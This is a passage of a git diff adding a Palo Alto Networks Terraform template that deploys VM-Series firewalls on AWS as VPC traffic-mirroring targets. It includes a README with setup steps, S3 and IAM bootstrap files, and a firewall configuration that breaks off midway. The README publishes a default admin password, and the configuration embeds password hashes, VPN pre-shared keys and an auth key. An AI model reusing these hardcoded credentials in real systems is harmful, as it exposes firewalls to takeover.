+* 1 x NLB Internal Load Balancer listening on VXLAN UDP Port 4789 (NGFW 3 & 4 as targets)
+* 2 x S3 Buckets for VM-Series 
+
+This is picture of the deployed environment:
+
+
+![deployment](https://user-images.githubusercontent.com/21991161/65703297-271e2700-e04a-11e9-9827-5512629c6db0.jpg)
+
+
+### Prerequistes 
+1. Terraform
+2. Access to AWS Console
+
+After deployment, the firewalls' username and password are:
+     * **Username:** admin
+     * **Password:** Pal0Alt0@123
+
+### Deployment
+1.  Download the **TGW-VPC-Mirroring** repo to the machine running the build
+2.  In an editor, open **variables.tf** and set values for the following variables
+
+| Variable        | Description |
+| :------------- | :------------- |
+| `aws_region` | AWS Region of Deployment|
+| `aws_key` | Authentication key file for deployed VMs |
+| `bootstrap_s3bucket3` | Universally unigue name for Boostrap S3 Bucket for NGFW3 |
+| `bootstrap_s3bucket4` | Universally unigue name for Boostrap S3 Bucket for NGFW4 |
+| 
+
+3. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After deployment an output with connection information will be displayed:
+![Output](https://user-images.githubusercontent.com/21991161/65703240-12419380-e04a-11e9-9dc4-4a89231fc857.jpg)
+
+6. To configure VPC Mirroring first select VPC/Traffic Mirroring/Mirror Filter and Create a new traffic mirror filter
+
+![Mirrorfilterselection](https://user-images.githubusercontent.com/21991161/65637508-eb338500-dfa9-11e9-893b-1255ed2f7135.jpg)" width="350">
+
+
+7. Fill in the fields and click create
+![MirrorFilterOptions](https://user-images.githubusercontent.com/21991161/65637506-eb338500-dfa9-11e9-9453-c9a32bf9f276.jpg)
+
+8. Next select VPC/Traffic Mirror/Mirror Targets and click Create a Mirror Target
+![Mirrortargetselection](https://user-images.githubusercontent.com/21991161/65637512-ebcc1b80-dfa9-11e9-9d27-a50ac1698ad3.jpg)
+
+
+9. Fill in the fields and click create
+![MirrorTargetoptions](https://user-images.githubusercontent.com/21991161/65637511-eb338500-dfa9-11e9-82b4-65cedbdeea71.jpg)
+
+10. Select VPC/Traffic Mirror/Mirror Sessions and click Create a Mirror Session
+![MirrorSessionSelection](https://user-images.githubusercontent.com/21991161/65637510-eb338500-dfa9-11e9-9966-b4f5d1b279ca.jpg)
+
+11. Fill in the fields and click create
+![mirrorsessionoptions](https://user-images.githubusercontent.com/21991161/65637509-eb338500-dfa9-11e9-87c9-fdfdb3a6a738.jpg)
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/aws/VPC_Mirror_Target/bootstrap3.tf b/aws/VPC_Mirror_Target/bootstrap3.tf
new file mode 100644
index 00000000..b8ae9407
--- /dev/null
+++ b/aws/VPC_Mirror_Target/bootstrap3.tf
@@ -0,0 +1,97 @@
+# Create a BootStrap S3 Bucket
+
+resource "aws_s3_bucket" "bootstrap_bucket3" {
+  bucket        = "${var.bootstrap_s3bucket3}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "bootstrap_bucket3"
+  }
+}
+
+# Create Folders and Upload Bootstrap Files
+resource "aws_s3_bucket_object" "bootstrap_xml3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files3/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files3/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files3/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content3" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket3.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+/* Roles, ACLs, Permissions, etc... */
+
+resource "aws_iam_role" "bootstrap_role3" {
+  name = "ngfw_bootstrap_role3"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy3" {
+  name = "ngfw_bootstrap_policy3"
+  role = "${aws_iam_role.bootstrap_role3.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket3}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket3}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile3" {
+  name = "ngfw_bootstrap_profile3"
+  role = "${aws_iam_role.bootstrap_role3.name}"
+  path = "/"
+}
diff --git a/aws/VPC_Mirror_Target/bootstrap4.tf b/aws/VPC_Mirror_Target/bootstrap4.tf
new file mode 100644
index 00000000..5c390435
--- /dev/null
+++ b/aws/VPC_Mirror_Target/bootstrap4.tf
@@ -0,0 +1,97 @@
+# Create a BootStrap S3 Bucket
+
+resource "aws_s3_bucket" "bootstrap_bucket4" {
+  bucket        = "${var.bootstrap_s3bucket4}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "bootstrap_bucket4"
+  }
+}
+
+# Create Folders and Upload Bootstrap Files
+resource "aws_s3_bucket_object" "bootstrap_xml4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files4/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files4/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files4/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content4" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket4.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+/* Roles, ACLs, Permissions, etc... */
+
+resource "aws_iam_role" "bootstrap_role4" {
+  name = "ngfw_bootstrap_role4"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy4" {
+  name = "ngfw_bootstrap_policy4"
+  role = "${aws_iam_role.bootstrap_role4.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket4}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket4}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile4" {
+  name = "ngfw_bootstrap_profile4"
+  role = "${aws_iam_role.bootstrap_role4.name}"
+  path = "/"
+}
diff --git a/aws/VPC_Mirror_Target/bootstrap_files3/authcodes b/aws/VPC_Mirror_Target/bootstrap_files3/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/aws/VPC_Mirror_Target/bootstrap_files3/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/aws/VPC_Mirror_Target/bootstrap_files3/bootstrap.xml b/aws/VPC_Mirror_Target/bootstrap_files3/bootstrap.xml
new file mode 100644
index 00000000..0bc73e6e
--- /dev/null
+++ b/aws/VPC_Mirror_Target/bootstrap_files3/bootstrap.xml
@@ -0,0 +1,857 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="9.0.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$cweppdgb$pU2XxH3TD.QyD29.TXnVT.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+      </entry>
+      <entry name="fwadmin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$kouigbds$mrNbt/msQehCS55jxNnYa.</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+                <interface-management-profile>LB Healthcheck</interface-management-profile>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+              <link-state>down</link-state>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="LB Healthcheck">
+              <http>yes</http>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway>
+            <entry name="VPN1">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>34.252.94.101</ip>
+              </peer-address>
+            </entry>
+            <entry name="VPN2">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>52.211.42.95</ip>
+              </peer-address>
+            </entry>
+          </gateway>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="vr">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FW-1</hostname>
+          <panorama-server>18.224.86.63</panorama-server>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <panorama-server>18.224.86.63</panorama-server>
+              <dns-primary>8.8.8.8</dns-primary>
+              <vm-auth-key>382932559738703</vm-auth-key>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="mirror">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="Mirror" uuid="9466bbc8-f16b-46a1-a548-aaabcf3dbeec">
+                  <to>
+                    <member>mirror</member>
+                  </to>
+                  <from>
+                    <member>mirror</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <rule-type>intrazone</rule-type>
+                  <profile-setting>
+                    <profiles>
+                      <url-filtering>
+                        <member>default</member>
+                      </url-filtering>
+                      <file-blocking>
+                        <member>strict file blocking</member>
+                      </file-blocking>
+                      <virus>
+                        <member>default</member>
+                      </virus>
+                      <spyware>
+                        <member>strict</member>
+                      </spyware>
+                      <vulnerability>
+                        <member>strict-1</member>
+                      </vulnerability>
+                      <wildfire-analysis>
+                        <member>default</member>
+                      </wildfire-analysis>
+                    </profiles>
+                  </profile-setting>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules/>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default" uuid="be660829-ab78-4a61-8871-b75510f3ecfc">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default" uuid="e34e1560-4e25-4254-b9bb-2c134f8b9121">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <tunnel-inspect>
+              <rules>
+                <entry name="Mirror" uuid="89ed6279-2e2c-49e2-889b-4f605d4a62ed">
+                  <monitor-options>
+                    <log-setting-override>
+                      <enable>no</enable>
+                    </log-setting-override>
+                  </monitor-options>
+                  <application>
+                    <member>vxlan</member>
+                  </application>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                </entry>
+              </rules>
+            </tunnel-inspect>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <profiles>
+            <vulnerability>
+              <entry name="strict-1">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-low">
